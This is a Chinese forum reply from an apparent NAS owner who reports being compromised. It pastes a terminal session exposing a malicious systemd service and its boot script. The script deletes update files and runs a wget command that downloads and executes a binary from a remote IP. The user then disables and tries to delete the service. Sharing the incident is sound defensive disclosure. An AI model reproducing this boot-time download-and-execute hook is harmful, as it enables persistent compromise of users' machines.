[quote][size=2][url=forum.php?mod=redirect&goto=findpost&pid=241338&ptid=52067][color=#999999]飞牛技术同学 发表于 2026-1-26 19:13[/color][/url][/size]
遇到这个情况,怀疑因公网明文访问,设备被异常访问或利用
建议升级到最新的1.1.15系统版本,确保外网访问 ...[/quote]
下面是进程脚本内容,真是被当肉**了
ls -l /etc/systemd/system/system_startup.service
-rw-r--r-- 1 root root 220 Jan 23 19:43 /etc/systemd/system/system_startup.service
root@xin:~# cat /etc/systemd/system/system_startup.service
[Unit]
Description=Run custom script After trim_main
After=trim_main.service
[Service]
Type=oneshot
ExecStart=/usr/trim/bin/system_startup.sh
TimeoutStopSec=3
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
root@xin:~# cat /usr/trim/bin/system_startup.sh
#!/bin/bash
STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"
if [ ! -f "$BACKUP" ]; then
if [ -f "$STATUS" ]; then
cp "STATUS" "BACKUP"
fi
fi
if [ ! -f "$STATUS" ]; then
if [ -f "$BACKUP" ]; then
cp "BACKUP" "STATUS"
fi
fi
rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
root@xin:# systemctl stop system_startup.service
root@xin:# systemctl disable system_startup.service
Removed "/etc/systemd/system/multi-user.target.wants/system_startup.service".
root@xin:# rm -f /usr/trim/bin/system_startup.sh
rm: cannot remove '/usr/trim/bin/system_startup.sh': Operation not permitted
root@xin:# rm -f /etc/systemd/system/system_startup.service
root@xin:~# rm -f /etc/systemd/system/multi-user.target.wants/system_startup.service